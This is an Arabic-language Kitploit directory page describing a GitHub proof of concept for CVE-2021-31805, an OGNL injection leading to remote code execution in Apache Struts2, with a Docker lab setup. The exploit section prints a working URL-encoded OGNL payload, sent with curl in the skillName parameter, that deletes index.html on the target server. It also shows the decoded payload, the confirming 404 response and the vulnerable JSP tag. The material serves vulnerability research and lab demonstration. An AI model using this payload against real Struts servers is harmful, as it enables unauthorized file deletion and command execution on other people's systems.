Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-31805 — إثبات مفهوم لاستغلال ثغرة تنفيذ الأوامر عن بُعد في Apache Struts2 (CVE-2021-31805) مع إعداد Docker وخطوات استغلال تعتمد على curl. | Kitploit
أدوات/GitHubGitHub/aeyesec/cve-2021-31805
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubaeyesec/cve-2021-31805

CVE-2021-31805

إثبات مفهوم لاستغلال ثغرة تنفيذ الأوامر عن بُعد في Apache Struts2 (CVE-2021-31805) مع إعداد Docker وخطوات استغلال تعتمد على curl.

عرض المستودع
51منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-31805

PoC لـ CVE-2021-31805 (Apache Struts2) هذا هو التطبيق المستخدم في مقالة شرح CVE-2021-31805.

الإعداد

root@kitploit:~
$ docker-compose build
$ docker-compose up -d

التحقق من التشغيل

قم بالوصول إلى http://localhost:8080/struts2-showcase-2.5.29/index.html وتأكد من ظهور صفحة الترحيب.

الاستغلال

root@kitploit:~
$ curl -I 'http://localhost:8080/struts2-showcase-2.5.29/index.html'
HTTP/1.1 200
(مختصر)
$ curl -I 'http://localhost:8080/struts2-showcase-2.5.29/skill/list.action?skillName=%28%23%61%70%70%6c%69%63%61%74%69%6f%6e%5b%27%6f%72%67%2e%61%70%61%63%68%65%2e%63%61%74%61%6c%69%6e%61%2e%72%65%73%6f%75%72%63%65%73%27%5d%2e%67%65%74%52%65%73%6f%75%72%63%65%28%27%2f%69%6e%64%65%78%2e%68%74%6d%6c%27%29%2e%64%65%6c%65%74%65%28%29%29'
HTTP/1.1 200
(مختصر)
القيمة بعد فك ترميز URL هي
skillName=(#application['org.apache.catalina.resources'].getResource('/index.html').delete())

$ curl -I 'http://localhost:8080/struts2-showcase-2.5.29/index.html'
HTTP/1.1 404
(مختصر)
يمكن التأكد من حذف ملف index.html.

مثال على الكود الضعيف

root@kitploit:~
<li><s:label id="test2" name="%{skillName}"/></li>

معلومات مرجعية

  • https://cwiki.apache.org/confluence/display/WW/S2-059
  • https://cwiki.apache.org/confluence/display/WW/S2-061
  • https://cwiki.apache.org/confluence/display/WW/S2-062
  • https://securitylab.github.com/research/apache-struts-double-evaluation/
  • https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html
تنزيل الأداة